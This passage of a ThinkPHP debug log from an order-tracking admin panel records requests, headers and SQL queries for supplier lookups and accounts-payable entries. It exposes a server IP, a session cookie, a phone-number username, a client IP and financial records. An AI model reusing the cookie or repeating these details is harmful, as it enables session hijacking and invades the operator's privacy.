47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.060530s][吞吐率:16.52req/s] [内存消耗:4,963.23kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001638s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.014980s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000440s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001632s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000406s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000338s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001279s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308621) [ RunTime:0.012332s ] --------------------------------------------------------------- [ 2022-07-20T17:18:16+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.083396s][吞吐率:11.99req/s] [内存消耗:5,535.39kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001318s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '284', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '1', 'suppliercustomer_id' => '89', 'worker_id' => '', 'explain' => '5月份运费20400+6月份运费12242', 'paid_money' => '32642', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001589s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008120s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000416s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001411s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000468s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001315s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001315s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001779s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000405s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001382s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000705s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `paid_money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (1 , 89 , 0 , '5月份运费20400+6月份运费12242' , 32642 , 40 , 2022 , 7 , 20 , 1658308696 , 1658308696 , 747756.81) [ RunTime:0.006930s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.001542s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001025s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`payable_money` , `payable_id` , `subject_type` , `explain` , `factorymge_id` , `createtime` , `updatetime` , `year` , `month` , `day` , `yu_money`) VALUES (32642 , 701 , 1 , '5月份运费20400+6月份运费12242' , 40 , 1658308696 , 1658308696 , 2022 , 7 , 20 , -608479.76558402) [ RunTime:0.005229s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001563s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加贷方' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"1\",\"suppliercustomer_id\":\"89\",\"worker_id\":\"\",\"explain\":\"5\\u6708\\u4efd\\u8fd0\\u8d3920400+6\\u6708\\u4efd\\u8fd0\\u8d3912242\",\"paid_money\":\"32642\"}}' , '/admin/financial/accountspayable/addyifu?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308696) [ RunTime:0.005256s ] --------------------------------------------------------------- [ 2022-07-20T17:18:16+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318504 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318504 [运行时间:0.070818s][吞吐率:14.12req/s] [内存消耗:5,683.34kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001072s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318504', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001501s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000112s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000546s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001382s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000526s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001109s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000976s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001560s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000369s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001216s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000895s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001306s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001153s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002760s ] --------------------------------------------------------------- [ 2022-07-20T17:18:18+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.054135s][吞吐率:18.47req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001277s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001630s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000124s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000512s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001451s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000414s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001120s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001391s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001891s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000458s ] --------------------------------------------------------------- [ 2022-07-20T17:18:19+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308698 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308698 [运行时间:0.035041s][吞吐率:28.54req/s] [内存消耗:3,854.94kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001114s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308698', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001929s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000103s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:18:20+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.054341s][吞吐率:18.40req/s] [内存消耗:4,963.06kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001298s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001865s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008632s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000522s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001444s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000388s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000562s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001423s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308700) [ RunTime:0.005922s ] --------------------------------------------------------------- [ 2022-07-20T17:18:22+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.052869s][吞吐率:18.91req/s] [内存消耗:4,963.09kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001690s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR 